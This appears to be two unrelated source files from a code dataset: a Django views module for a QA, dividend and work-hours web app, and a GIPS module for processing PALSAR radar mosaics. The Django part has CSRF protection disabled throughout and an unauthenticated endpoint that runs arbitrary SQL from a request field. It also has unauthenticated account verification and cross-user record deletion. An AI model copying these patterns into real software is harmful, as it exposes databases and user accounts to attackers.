hours_worked_for_the_week += total_hours_worked
hours_worked_as_percentage_of_total = str(int((total_hours_worked / 8.0) * 100.0))
day_summary.append([days[e], hours_worked_as_percentage_of_total, str(total_hours_worked)])
total_percentage = str(int((hours_worked_for_the_week / 40.0) * 100.0))
return render(request, PERSONAL_PAGES_WORK_HOURS_LOGGING, {'total_percentage': total_percentage, 'total_hours': str(hours_worked_for_the_week), 'day_summary': day_summary, 'hours_works': all_work_hours_for_this_week, 'old_hours_worked': all_work_hours_outside_of_this_week, 'build_number': NEXUS_BUILD_NUMBER, 'current_date': get_current_date_as_string(), 'current_time': get_current_time_as_string()})
@login_required(login_url=LOGIN_URL)
def admin_GET(request):
"""This handles the GET request to retrieve the admin page.
:param request: Contains information regarding the request sent in.
:return: The admin HTML page.
"""
return render(request, ADMIN_PAGES_ADMIN, {'feedback': Feedback.objects.all(), 'projects': Project.objects.all(), 'build_number': NEXUS_BUILD_NUMBER})
''' __ __ ___ __
|__) /\ / ` |__/ |__ |\ | | \
|__) /~~\ \__, | \ |___ | \| |__/
'''
# User related!
@csrf_exempt
def verify_user_GET(request):
"""This handles the POST request for when a user clicks on their verification link.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse. In this case nothing useful will be returned lol. Just empty text.
"""
email = request.GET.get('email', 'no_email')
	if email != 'no_email':
		user_to_verify = User.objects.get(email=email)
		user_to_verify.profile.verify()
		sms_sender.send_sms_message('New user has verified!', 'The user is :' + email, '[email protected]')
		return SERVER_REPLY_GENERIC_YES
else:
return HttpResponse('Invalid request, please provide an email to verify.')
@csrf_exempt
def login_POST(request):
"""This handles the POST request to login.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse. In this case just a string contain success or failure status.
"""
if check_POST_arguments([USERNAME, PASSWORD], request) is not None:
return check_POST_arguments([USERNAME, PASSWORD], request)
received_username = request.POST[USERNAME]
received_password = request.POST[PASSWORD]
user = authenticate(username=received_username, password=received_password)
if user is not None:
print('Valid login combo for : ' + received_username + '!')
login(request, user)
return SERVER_REPLY_GENERIC_YES
else:
print('Login attempt failed for ' + received_username + '!')
return SERVER_REPLY_GENERIC_NO
@csrf_exempt
def modify_account_POST(request):
"""This handles the POST request to modify a user's information.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse. Just a server_reply_response_string.
"""
if check_POST_arguments([PHONE_NUMBER, CELL_CARRIER, ZIP_CODE, BIRTHDAY, FIRST_NAME, LAST_NAME], request) is not None:
return check_POST_arguments([PHONE_NUMBER, CELL_CARRIER, ZIP_CODE, BIRTHDAY, FIRST_NAME, LAST_NAME], request)
current_user = request.user
# TODO : Add syntax/formatting checks against these fields!
current_user.profile.update_profile_information(cell_number=request.POST[PHONE_NUMBER], cell_carrier=request.POST[CELL_CARRIER], zip_code=request.POST[ZIP_CODE], birthday=request.POST[BIRTHDAY], first_name=request.POST[FIRST_NAME], last_name=request.POST[LAST_NAME])
return SERVER_REPLY_GENERIC_YES
@csrf_exempt
def create_user_POST(request):
"""This handles the POST request to create a user.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse. Just a server_reply_response_string.
"""
if check_POST_arguments([USERNAME, EMAIL, PASSWORD], request) is not None:
return check_POST_arguments([USERNAME, EMAIL, PASSWORD], request)
received_username = request.POST[USERNAME]
received_password = request.POST[PASSWORD]
received_email = request.POST[EMAIL]
if User.objects.filter(username=received_username).exists():
return SERVER_REPLY_GENERIC_SERVER_ERROR
elif User.objects.filter(email=received_email).exists():
return SERVER_REPLY_GENERIC_SERVER_ERROR
else:
print('The user ' + received_username + ' is being created and logged in!')
sms_sender.send_sms_message('Nexus Quality Assurance Account Verification', 'Hello hello! Please click this link to send the admin a verification request (sccqa.com/verify?email=' + received_email + '). This gets sent as a text message so account creation shouldn\'t take too long....(╯°□°)╯︵ ┻━┻ ..... ┬─┬ ノ( ゜-゜ノ).', received_email)
user = User.objects.create_user(username=received_username, password=received_password, email=received_email)
login(request, user)
return SERVER_REPLY_GENERIC_YES
@csrf_exempt
def delete_account_POST(request):
"""This handles the POST request to delete the user account.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse. Just a server_reply_response_string.
"""
current_user = request.user
if current_user is not None:
print('Deleting the account : ' + str(current_user))
logout(request)
current_user.delete()
return SERVER_REPLY_GENERIC_YES
else:
print('Could not delete the account ' + str(current_user) + ' as it does not exist!?!')
return SERVER_REPLY_GENERIC_NO
@csrf_exempt
def send_recover_email_POST(request):
"""This handles the POST request to send a recovery email.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse. Just a server_reply_response_string.
"""
if check_POST_arguments([EMAIL], request) is not None:
return check_POST_arguments([EMAIL], request)
received_email = request.POST[EMAIL]
if not User.objects.filter(email=received_email).exists():
return SERVER_REPLY_GENERIC_NO
else:
print('Recovery email sent to ' + received_email + '!')
sms_sender.send_sms_message('NQA response', 'Password recovery is not setup yet!', received_email)
return SERVER_REPLY_GENERIC_YES
# Admin back end operations.
@csrf_exempt
def hit_peon_URL_POST(request):
"""This handles the POST request to hit the peon server with a custom URL.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse from the peon server.
"""
if check_POST_arguments([PEON_URL], request) is not None:
return check_POST_arguments([PEON_URL], request)
print('Got the peon url of : ' + str(request.POST[PEON_URL]) + '.')
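# Strip newlines and spaces from the submitted path before forwarding it to the peon server.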
received_peon_url = str(request.POST[PEON_URL]).replace('\n', '').replace(' ', '')
response = requests.get('http://23.253.22.69:1337/' + received_peon_url)
if response.status_code == 200:
return HttpResponse(response.content)
else:
print('Peon server error!')
return HttpResponse('Peon server error!')
@csrf_exempt
def run_custom_SQL_POST(request):
"""This handles the POST request to run a custom SQL command.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse.
"""
if check_POST_arguments([CUSTOM_SQL_COMMAND], request) is not None:
return check_POST_arguments([CUSTOM_SQL_COMMAND], request)
received_sql_command = request.POST[CUSTOM_SQL_COMMAND]
print('Received the custom SQL command : ' + str(received_sql_command))
results = db_api.run_custom_sql_command(received_sql_command)
print('The results were : ' + str(results))
return HttpResponse(str(results))
# DIVIDENDS BACK END.
@csrf_exempt
def get_dividends_data_POST(request):
"""This handles the POST request to get dividends data.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse.
"""
data = Dividend.objects.filter(user=request.user)
if 'as_string' in request.get_full_path():
return_string = ''
for d in data:
return_string += str(d)
return HttpResponse(return_string)
else:
json_data = []
for d in data:
local_data = {'payout_date': int(time.mktime(d.payout_date.timetuple())), 'number_of_shares': d.number_of_shares, 'pay_per_share': d.pay_per_share, 'share_ticker': d.share_ticker}
json_data.append(local_data)
return JsonResponse(json_data, safe=False)
@csrf_exempt
def add_dividend_payment_POST(request):
"""This handles the POST request to add a dividend payment.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse.
"""
if check_POST_arguments([PAYMENT_PER_SHARE, STOCK_TICKER_SYMBOL, NUMBER_OF_SHARES, PAYOUT_DATE], request) is not None:
return check_POST_arguments([PAYMENT_PER_SHARE, STOCK_TICKER_SYMBOL, NUMBER_OF_SHARES, PAYOUT_DATE], request)
received_number_of_shares = request.POST[NUMBER_OF_SHARES]
received_payment_per_share = request.POST[PAYMENT_PER_SHARE]
received_stock_symbol = request.POST[STOCK_TICKER_SYMBOL]
received_payout_date = request.POST[PAYOUT_DATE]
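# The payout date arrives as MM/DD/YYYY; rearrange it to YYYY-MM-DD before saving.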
segments = received_payout_date.split('/')
received_payout_date = segments[2] + '-' + segments[0] + '-' + segments[1]
dividend = Dividend(user=request.user, payout_date=received_payout_date, number_of_shares=received_number_of_shares, pay_per_share=received_payment_per_share, share_ticker=received_stock_symbol)
dividend.save()
return SERVER_REPLY_GENERIC_YES
@csrf_exempt
def remove_dividend_payment_POST(request):
"""This handles the POST request to remove a dividend payment.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse.
"""
if check_POST_arguments([STOCK_TICKER_SYMBOL, PAYOUT_DATE], request) is not None:
return check_POST_arguments([STOCK_TICKER_SYMBOL, PAYOUT_DATE], request)
received_stock_symbol = request.POST[STOCK_TICKER_SYMBOL]
received_payout_date = request.POST[PAYOUT_DATE]
transaction = Dividend.objects.filter(payout_date=received_payout_date, share_ticker=received_stock_symbol)
transaction.delete()
return SERVER_REPLY_GENERIC_YES
# LOCUST BACK END.
@csrf_exempt
def is_locust_currently_running_GET(request):
if locust_api.is_locust_currently_running():
return SERVER_REPLY_GENERIC_YES
else:
return SERVER_REPLY_GENERIC_NO
@csrf_exempt
def get_current_table_data_GET(request):
try:
data = locust_api.get_current_table_data()
return data
except Exception:
print('Exception happened when trying to get current table data for QA page.')
return JsonResponse({'data': []})
@csrf_exempt
def launch_swarming_POST(request):
if check_POST_arguments([NUMBER_OF_USERS, SPAWN_RATE, TEST_DURATION], request) is not None:
return check_POST_arguments([NUMBER_OF_USERS, SPAWN_RATE, TEST_DURATION], request)
received_number_of_users = request.POST[NUMBER_OF_USERS]
received_spawn_rate = request.POST[SPAWN_RATE]
received_test_duration = request.POST[TEST_DURATION]
print('Just got an order to launch swarming, here are the parameters : [' + str(received_number_of_users) + ', ' + str(received_spawn_rate) + ', ' + str(received_test_duration) + ']')
locust_api.launch_swarming(received_number_of_users, received_spawn_rate, received_test_duration)
return SERVER_REPLY_GENERIC_YES
# For text notification scheduling.
@csrf_exempt
def schedule_message_POST(request):
"""This handles the POST request to schedule a text notification message.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse. Just a server_reply_response_string.
"""
if check_POST_arguments([MESSAGE_CONTENT, MESSAGE_TIME, MESSAGE_DATE], request) is not None:
return check_POST_arguments([MESSAGE_CONTENT, MESSAGE_TIME, MESSAGE_DATE], request)
current_user = request.user
received_content = str(request.POST[MESSAGE_CONTENT])
received_time = str(request.POST[MESSAGE_TIME])
received_date = str(request.POST[MESSAGE_DATE])
#print('This is the time that I got: ' + str(received_time))
#print('This is the date that I got: ' + str(received_date))
# TODO : Do more error checking here.
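# The date field is expected as MM/DD/YYYY and the time field as HH:MM (24-hour).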
year = int(received_date.split('/')[2])
day = int(received_date.split('/')[1])
month = int(received_date.split('/')[0])
hour = int(received_time.split(':')[0])
minute = int(received_time.split(':')[1])
created_at_time = datetime.datetime.now()
scheduled_text_notification = ScheduledTextNotification(user=current_user, message_to_send=received_content, created_at=created_at_time, execute_at=created_at_time.replace(year=year, month=month, day=day, hour=hour, minute=minute))
scheduled_text_notification.save_and_schedule_message()
return SERVER_REPLY_GENERIC_YES
@csrf_exempt
def verify_message_was_sent_POST(request):
"""This handles the POST request to verify that a text notification message was sent.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse. Just a server_reply_response_string.
"""
if check_POST_arguments([UNIQUE_ID], request) is not None:
return check_POST_arguments([UNIQUE_ID], request)
received_id = request.POST[UNIQUE_ID]
print('Just got a verification message!')
print('ID is : ' + str(received_id))
scheduled_text_notification = ScheduledTextNotification.objects.get(id=received_id)
scheduled_text_notification.verify()
return SERVER_REPLY_GENERIC_YES
# For QA/General Selenium.
class TestResult:
"""
Outlines the information contained in a single test result.
"""
def __init__(self, name, browser_used, run_time, passed, notes):
self.test_name = name
self.browser_used = browser_used
self.run_time = run_time
self.passed = passed
self.notes = notes
class TestSuite:
"""
Outlines the information contained in a single test suite.
"""
def __init__(self, unique_id, project_name):
self.unique_id = unique_id
self.project_name = project_name
class TestSuiteCache:
"""
Manages cache information for users and selenium tests run.
"""
def __init__(self):
# This will be a double dictionary. The first layer of key:value pairs is {user_name:dictionary_of_test_suites}.
# The dictionary_of_test_suites is composed of {test_suite_unique_number:list_of_selenium_tests}.
self.cache_for_users_and_test_suites = {}
def add_new_test_suite(self, username, unique_id, project_name):
"""This will add a new test suite to keep track of.
:param username: The name of the user.
:param unique_id: The unique id of the test suite.
:param project_name: The project name that this suite is testing.
:return: Void.
"""
if username not in self.cache_for_users_and_test_suites:
self.cache_for_users_and_test_suites[username] = {}
if unique_id not in self.cache_for_users_and_test_suites[username]:
self.cache_for_users_and_test_suites[username][unique_id] = {}
def add_new_test_result(self, test_result, unique_id):
"""This will add a new test result to keep track of.
:param test_result: The results of this specific test.
:param unique_id: The unique id of the test suite.
:return: Void.
"""
# Find the test suite.
user_match = None
for user_key in self.cache_for_users_and_test_suites.keys():
if unique_id in self.cache_for_users_and_test_suites[str(user_key)]:
user_match = str(user_key)
break
#print('--------------------------------------------------------------------------------------------------------------------------------')
#print('THE USER MATCH IS : {' + str(user_match) + '}')
#print('--------------------------------------------------------------------------------------------------------------------------------')
if user_match is None:
dbg.terminate('No match!')
if test_result.test_name not in self.cache_for_users_and_test_suites[user_match][unique_id]:
self.cache_for_users_and_test_suites[user_match][unique_id][test_result.test_name] = {}
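# Cache entry layout: [already_fetched_flag, run_time, passed, notes].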
self.cache_for_users_and_test_suites[user_match][unique_id][test_result.test_name][test_result.browser_used] = [False, test_result.run_time, test_result.passed, test_result.notes]
def fetch_test_results(self, username, unique_id):
"""This will return the data of a test suite that has not been sent yet.
:param username: The username to get the test suite from.
:param unique_id: The unique ID of the test suite to get single test results from.
:return: The results from the test suite.
"""
#print('---------------------------------------------------------------------------------------')
#print(username)
#print(unique_id)
#print(self.cache_for_users_and_test_suites)
#print('#######################################################################################')
#for user in self.cache_for_users_and_test_suites:
# print('Printing cache information for user : ' + str(user))
# for ts in self.cache_for_users_and_test_suites[user]:
# print('Printing cache information for test suite : ' + str(ts))
# for t in self.cache_for_users_and_test_suites[user][ts]:
# print('Printing cache information for test : ' + str(t))
# for st in self.cache_for_users_and_test_suites[user][ts][t]:
# print(str(st) + str(self.cache_for_users_and_test_suites[user][ts][t][st]))
#for k in self.cache_for_users_and_test_suites:
# print(str(k) + '\t' + str(self.cache_for_users_and_test_suites[k]))
#print('---------------------------------------------------------------------------------------')
data_to_return = []
if username in self.cache_for_users_and_test_suites:
if unique_id in self.cache_for_users_and_test_suites[username]:
# Go through each test.
for test_name in self.cache_for_users_and_test_suites[username][unique_id]:
# Go through each browser variation of that test.
for b in self.cache_for_users_and_test_suites[username][unique_id][test_name]:
#print('@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@')
#print(self.cache_for_users_and_test_suites[username][unique_id][test_name][b])
#print(self.cache_for_users_and_test_suites[username][unique_id][test_name][b][0])
#print('@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@')
if not self.cache_for_users_and_test_suites[username][unique_id][test_name][b][0]:
v0 = self.cache_for_users_and_test_suites[username][unique_id][test_name][b][1]
v1 = self.cache_for_users_and_test_suites[username][unique_id][test_name][b][2]
v2 = self.cache_for_users_and_test_suites[username][unique_id][test_name][b][3]
#data_to_return[test_name] = [b, v0, v1, v2]
data_to_return.append([test_name, b, v0, v1, v2])
# Mark this value as returned.
self.cache_for_users_and_test_suites[username][unique_id][test_name][b][0] = True
return data_to_return
else:
return []
else:
return []
def get_test_results_for_specific_test_suite(self, username, unique_id):
"""This will return the data of a specific test suite.
:param username: The username to get the test suite from.
:param unique_id: The unique ID of the test suite to get.
:return: The results from the test suite.
"""
if username in self.cache_for_users_and_test_suites:
if unique_id in self.cache_for_users_and_test_suites[username]:
return self.cache_for_users_and_test_suites[username][unique_id]
else:
return {}
else:
return {}
test_suite_cache = TestSuiteCache()
@csrf_exempt
def get_selenium_project_data_POST(request):
"""This handles the POST request to get selenium history data from the PEON server.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse.
"""
if check_POST_arguments([PROJECT_NAME], request) is not None:
return check_POST_arguments([PROJECT_NAME], request)
# TODO : Add a check that this request was specifically sent from the PEON server.
response = requests.post(PEON_IP_URL + 'get_selenium_project_data', data={PROJECT_NAME: request.POST[PROJECT_NAME]})
return JsonResponse(ast.literal_eval(response.content.decode('utf-8')), safe=False)
@csrf_exempt
def get_test_suite_number_POST(request):
"""This handles the POST request to get a test suite number from the PEON server.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse.
"""
if check_POST_arguments([PROJECT_NAME], request) is not None:
return check_POST_arguments([PROJECT_NAME], request)
received_project_name = request.POST[PROJECT_NAME]
global test_suite_cache
response = requests.post(PEON_IP_URL + 'get_test_suite_number', data={PROJECT_NAME: received_project_name})
if response.status_code == 200:
unique_id = response.content.decode('utf-8')
print('Got the test suite number of ' + str(unique_id) + '!')
test_suite_cache.add_new_test_suite(username=str(request.user), unique_id=unique_id, project_name=received_project_name)
return HttpResponse(unique_id)
else:
return SERVER_REPLY_GENERIC_NO
@csrf_exempt
def launch_test_suite_POST(request):
"""This handles the POST request to launch a test suite on the PEON server.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse.
"""
if check_POST_arguments([UNIQUE_ID, PROJECT_NAME], request) is not None:
return check_POST_arguments([UNIQUE_ID, PROJECT_NAME], request)
response = requests.post(PEON_IP_URL + 'launch_test_suite', data={UNIQUE_ID: request.POST[UNIQUE_ID], PROJECT_NAME: request.POST[PROJECT_NAME]})
if response.status_code == 200:
return SERVER_REPLY_GENERIC_YES
else:
print('Error with PEON!')
print(response.content)
return SERVER_REPLY_GENERIC_NO
@csrf_exempt
def single_test_data_POST(request):
"""This handles the POST request to add test data into the server's cache.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse.
"""
if check_POST_arguments([UNIQUE_ID, TEST_NAME, TEST_RUN_TIME, TEST_PASS_OR_FAIL, TEST_NOTES, BROWSER_USED], request) is not None:
return check_POST_arguments([UNIQUE_ID, TEST_NAME, TEST_RUN_TIME, TEST_PASS_OR_FAIL, TEST_NOTES, BROWSER_USED], request)
received_test_name = request.POST[TEST_NAME]
received_test_run_time = request.POST[TEST_RUN_TIME]
received_test_pass_or_fail = request.POST[TEST_PASS_OR_FAIL]
received_unique_id = request.POST[UNIQUE_ID]
received_test_notes = request.POST[TEST_NOTES]
received_browser_used = request.POST[BROWSER_USED]
# TODO : Add a check that the PEON was the one that sent the request.
global test_suite_cache
test_result = TestResult(name=received_test_name, browser_used=received_browser_used, run_time=received_test_run_time, passed=received_test_pass_or_fail, notes=received_test_notes)
test_suite_cache.add_new_test_result(test_result, received_unique_id)
return SERVER_REPLY_GENERIC_YES
@csrf_exempt
def fetch_suite_data_POST(request):
"""This handles the POST request to get any newly generated table data.
:param request: Contains information regarding the request sent in.
:return: Any new data in a JSON_Response.
"""
if check_POST_arguments([UNIQUE_ID], request) is not None:
return check_POST_arguments([UNIQUE_ID], request)
global test_suite_cache
data = test_suite_cache.fetch_test_results(str(request.user), request.POST[UNIQUE_ID])
return JsonResponse(data, safe=False)
@csrf_exempt
def get_table_data_POST(request):
"""This handles the POST request to get the current table data.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse.
"""
if check_POST_arguments([UNIQUE_ID], request) is not None:
return check_POST_arguments([UNIQUE_ID], request)
global test_suite_cache
data = test_suite_cache.get_test_results_for_specific_test_suite(str(request.user), request.POST[UNIQUE_ID])
return JsonResponse(data, safe=False)
@csrf_exempt
def add_project_POST(request):
"""This handles the POST request to add a project.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse. Just a server_reply_response_string.
"""
if check_POST_arguments([PROJECT_NAME, PROJECT_DESCRIPTION, CURRENT_HOME_URL], request) is not None:
return check_POST_arguments([PROJECT_NAME, PROJECT_DESCRIPTION, CURRENT_HOME_URL], request)
received_project_name = request.POST[PROJECT_NAME]
received_project_description = request.POST[PROJECT_DESCRIPTION]
received_current_home_url = request.POST[CURRENT_HOME_URL]
project = Project(project_name=received_project_name, project_description=received_project_description, current_home_url=received_current_home_url)
project.save()
return SERVER_REPLY_GENERIC_YES
# For work hours logging.
@csrf_exempt
def remove_work_hours_POST(request):
"""This handles the POST request to delete work hours.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse. Just a server_reply_response_string.
"""
if check_POST_arguments([UNIQUE_ID], request) is not None:
return check_POST_arguments([UNIQUE_ID], request)
received_unique_id = request.POST[UNIQUE_ID]
work_hours = WorkHours.objects.filter(unique_id=received_unique_id)
work_hours.delete()
return SERVER_REPLY_GENERIC_YES
'''
@csrf_exempt
def get_work_hours_POST(request):
"""This handles the POST request to get the current user's work hours.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse. Just a server_reply_response_string.
"""
data = []
original_data = WorkHours.objects.filter(user=request.user)
for d in original_data:
data.append({'start_or_stop_time': d.start_or_stop_time, 'is_start_time': d.is_start_time})
return JsonResponse(data)
'''
@csrf_exempt
def add_work_hours_POST(request):
"""This handles the POST request to add work hours.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse. Just a server_reply_response_string.
"""
if check_POST_arguments([START_OR_STOP_TIME, IS_START_TIME], request) is not None:
return check_POST_arguments([START_OR_STOP_TIME, IS_START_TIME], request)
received_start_or_stop_time = request.POST[START_OR_STOP_TIME]
local_date = received_start_or_stop_time.split(',')[0]
local_time = received_start_or_stop_time.split(',')[1]
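# local_date is expected as MM/DD/YYYY and local_time as HH:MM (24-hour).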
year = int(local_date.split('/')[2])
month = int(local_date.split('/')[0])
day = int(local_date.split('/')[1])
hour = int(local_time.split(':')[0])
minute = int(local_time.split(':')[1])
print('Hour: ' + str(hour))
print('Minute: ' + str(minute))
#date_time_object = datetime.datetime(year=year, month=month, day=day, hour=hour, minute=minute, tzinfo=pytz.timezone('America/Chicago'))
date_time_object = datetime.datetime(year=year, month=month, day=day, hour=hour, minute=minute)
print(date_time_object)
#print('Going to add the following date time object : ')
#print(str(date_time_object))
received_is_start_time = request.POST[IS_START_TIME]
if received_is_start_time == 'false' or received_is_start_time == '\'false\'':
received_is_start_time = False
elif received_is_start_time == 'true' or received_is_start_time == '\'true\'':
received_is_start_time = True
#print('Trying to add work hours!')
#print(received_start_or_stop_time)
#print(received_is_start_time)
work_hours = WorkHours(user=request.user, start_or_stop_time=date_time_object, is_start_time=received_is_start_time)
work_hours.save()
return SERVER_REPLY_GENERIC_YES
# For Feedback.
@csrf_exempt
def send_feedback_POST(request):
"""This handles the POST request to send feedback.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse. Just a server_reply_response_string.
"""
if check_POST_arguments([CONTENT, PAGE_SENT_FROM], request) is not None:
return check_POST_arguments([CONTENT, PAGE_SENT_FROM], request)
received_feedback = request.POST[CONTENT]
received_page_sent_from = request.POST[PAGE_SENT_FROM]
feedback = Feedback(user=request.user, content=received_feedback, sent_at=datetime.datetime.now(), page_sent_from=received_page_sent_from)
feedback.save()
return SERVER_REPLY_GENERIC_YES
# SCC
def log_request(request):
with open('requests_logging.log', 'a') as f:
f.write(str(datetime.datetime.now()))
f.write(str(request.body))
f.write(str(request.path))
f.write(str(request.path_info))
f.write(str(request.method))
f.write(str(request.META))
f.write(str('@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@'))
@csrf_exempt
def launch_functional_tests_for_sk_POST(request):
log_request(request)
return HttpResponse('This URL doesn\'t do anything yet :D')
@csrf_exempt
def launch_functional_tests_for_qa_POST(request):
log_request(request)
return HttpResponse('This URL doesn\'t do anything yet :D')
@csrf_exempt
def launch_functional_tests_for_nationals_POST(request):
log_request(request)
return HttpResponse('This URL doesn\'t do anything yet :D')
@csrf_exempt
def general_request(request):
log_request(request)
return HttpResponse('This URL doesn\'t do anything yet :D')
#
@csrf_exempt
def send_data_to_flax_POST(request):
if check_POST_arguments(['qa_data'], request) is not None:
return check_POST_arguments(['qa_data'], request)
# qa_data
response = requests.post(PEON_IP_URL + 'send_data_to_flax', data={'qa_data': request.POST['qa_data']})
if response.status_code == 200:
print('Peon got the message to send data to flax!')
else:
print('Peon did not get the message to send data to flax!')
return SERVER_REPLY_GENERIC_YES
| apache-2.0 | -8,846,890,920,118,647,000 | 37.90747 | 403 | 0.698318 | false |
Applied-GeoSolutions/gips | gips/data/sarannual/sarannual.py | 1 | 6502 | #!/usr/bin/env python
################################################################################
# GIPS: Geospatial Image Processing System
#
# AUTHOR: Matthew Hanson
# EMAIL: [email protected]
#
# Copyright (C) 2014-2018 Applied Geosolutions
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
################################################################################
import os
import datetime
import gippy
from gips.data.core import Repository, Asset, Data
from gips.utils import RemoveFiles, VerboseOut
from gips import utils
class sarannualRepository(Repository):
name = 'SARAnnual'
description = 'Synthetic Aperture Radar PALSAR Mosaics'
_datedir = '%Y'
@classmethod
def feature2tile(cls, feature):
""" Get tile designation from a geospatial feature (i.e. a row) """
fldindex_lat = feature.GetFieldIndex("lat")
fldindex_lon = feature.GetFieldIndex("lon")
lat = int(feature.GetField(fldindex_lat) + 0.5)
lon = int(feature.GetField(fldindex_lon) - 0.5)
if lat < 0:
lat_h = 'S'
else:
lat_h = 'N'
if lon < 0:
lon_h = 'W'
else:
lon_h = 'E'
tile = lat_h + str(abs(lat)).zfill(2) + lon_h + str(abs(lon)).zfill(3)
return tile
class sarannualAsset(Asset):
Repository = sarannualRepository
_sensors = {
#'AFBS': 'PALSAR FineBeam Single Polarization',
'PALSAR': {'description': 'PALSAR Mosaic (FineBeam Dual Polarization)'},
#'AWB1': 'PALSAR WideBeam (ScanSAR Short Mode)',
#'JFBS': 'JERS-1 FineBeam Single Polarization'
}
_assets = {
'MOS': {
'startdate': datetime.date(1, 1, 1),
'latency': 0,
'pattern': r'^.{7}_.{2}_MOS\.tar\.gz$'
},
'FNF': {
'startdate': datetime.date(1, 1, 1),
'latency': 0,
'pattern': r'^.{7}_.{2}_FNF\.tar\.gz$'
},
}
_defaultresolution = [0.00044444444, 0.00044444444]
def __init__(self, filename):
""" Inspect a single file and get some basic info """
super(sarannualAsset, self).__init__(filename)
bname = os.path.basename(filename)
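# Mosaic asset filenames follow 'N07E100_07_MOS.tar.gz': 7-character tile, 2-digit year, asset type.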
self.asset = bname[11:14]
self.tile = bname[0:7]
self.sensor = 'PALSAR'
self.date = datetime.datetime.strptime(bname[8:10], '%y')
self.rootname = bname[0:10]
def extract(self, filenames=[]):
""" Extract filesnames from asset """
files = super(sarannualAsset, self).extract(filenames)
datafiles = {}
for f in files:
bname = os.path.basename(f)
if f[-3:] != 'hdr':
bandname = bname[len(self.rootname) + 1:]
datafiles[bandname] = f
return datafiles
class sarannualData(Data):
""" Tile of data """
name = 'SARAnnual'
version = '0.9.0'
Asset = sarannualAsset
_pattern = '*'
_products = {
'sign': {
'description': 'Sigma nought (radar backscatter coefficient)',
'assets': ['MOS'],
},
'fnf': {
'description': 'Forest/NonForest Mask',
'assets': ['FNF'],
}
}
def meta(self, tile):
""" Get metadata for this tile """
return {'CF': -83.0}
def find_files(self):
""" Search path for valid files """
filenames = super(sarannualData, self).find_files()
filenames[:] = [f for f in filenames if os.path.splitext(f)[1] != '.hdr']
return filenames
def process(self, *args, **kwargs):
""" Process all requested products for this tile """
products = super(sarannualData, self).process(*args, **kwargs)
if len(products) == 0:
return
self.basename = self.basename + '_' + self.sensor_set[0]
for key, val in products.requested.items():
fname = os.path.join(self.path, self.basename + '_' + key)
# Verify that asset exists
a_type = self._products[val[0]]['assets'][0]
a_obj = self.assets.get(a_type)
if a_obj is None:
utils.verbose_out("Asset {} doesn't exist for tile {}".format(a_type, self.id), 3)
continue
datafiles = None
with utils.error_handler("Error extracting files from asset {}".format(a_obj.filename),
continuable=True):
datafiles = a_obj.extract()
if datafiles is None:
continue
if val[0] == 'sign':
bands = [datafiles[b] for b in ["sl_HH", "sl_HV"] if b in datafiles]
if len(bands) > 0:
img = gippy.GeoImage(bands)
img.set_nodata(0)
mask = gippy.GeoImage(datafiles['mask'], False)
img.AddMask(mask[0] == 255)
imgout = gippy.GeoImage.create_from(img, fname, 'float32')
imgout.set_nodata(-32768)
for b in range(0, len(imgout)):
imgout.set_bandname(img[b].description(), b + 1)
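# Convert DN to sigma nought (dB): 10 * log10(DN^2) + CF, with CF = -83.0 from meta().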
(img[b].pow(2).log10() * 10 - 83.0).save(imgout[b])
fname = imgout.filename()
img = None
imgout = None
[RemoveFiles([f], ['.hdr', '.aux.xml']) for k, f in datafiles.items() if k != 'hdr']
if val[0] == 'fnf':
if 'C' in datafiles:
# rename both files to product name
os.rename(datafiles['C'], fname)
os.rename(datafiles['C'] + '.hdr', fname + '.hdr')
img = gippy.GeoImage(fname)
img.set_nodata(0)
img = None
self.AddFile(self.sensor_set[0], key, fname)
| gpl-3.0 | 4,833,266,800,454,739,000 | 35.943182 | 104 | 0.527222 | false |